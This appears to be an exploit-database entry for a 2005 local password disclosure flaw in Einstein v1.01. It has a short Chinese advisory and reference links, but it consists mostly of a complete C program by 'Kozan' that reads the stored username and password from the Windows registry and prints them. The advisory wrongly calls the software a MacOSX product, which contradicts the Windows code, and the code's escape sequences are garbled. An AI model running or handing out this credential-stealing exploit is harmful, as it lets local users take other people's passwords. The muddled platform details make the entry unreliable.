https://www.exploit-db.com/exploits/846
https://www.securityfocus.com/bid/90187
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200502-105

Einstein是一款为MacOSX设计的问题测试软件。Einstein1.0.1在注册表里以明文的形式存储了username和password等敏感信息，本地用户可以以此获得相应权限。

/*******************************************************************

Einstein v1.01 Local Password Disclosure Exploit by Kozan

Application: Einstein v1.01 (and previous versions)
Procuder: Bfriendly.com
Vulnerable Description: Einstein v1.01 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: [email protected]

*******************************************************************/

#include <stdio.h>
#include <windows.h>

HKEY hKey;

#define BUFSIZE 100
char username[BUFSIZE], password[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main(void)
{

       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\einstein",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
       {

           lRet = RegQueryValueEx( hKey, "username", NULL, NULL,
              (LPBYTE) username, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("En error occured!");
                                return 0;
                       }

                       lRet = RegQueryValueEx( hKey, "password", NULL, NULL,
              (LPBYTE) password, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("En error occured!");
                                return 0;
                       }
                       RegCloseKey( hKey );

                       printf("Einstein v1.01 Local Exploit by Kozann");
                       printf("Credits to ATmaCAn");
                       printf("www.netmagister.com  -  www.spyinstructors.comn");
                       printf("[email protected]");
                       printf("Username: %sn",username);
                       printf("Password: %sn",password);

        }
        else{
                printf("Einstein v1.01 is not installed on your system!n");
        }

       return 0;
}

// milw0rm.com [2005-02-27]

Bfriendly.Com Einstein 1.0.1

来源:OSVDB
名称:14212
链接:http://www.osvdb.org/14212
来源:SECTRACK
名称:1013316
链接:http://securitytracker.com/id?1013316
来源:SECUNIA
名称:14455
链接:http://secunia.com/advisories/14455
来源:MILW0RM
名称:846
链接:http://milw0rm.com/exploits/846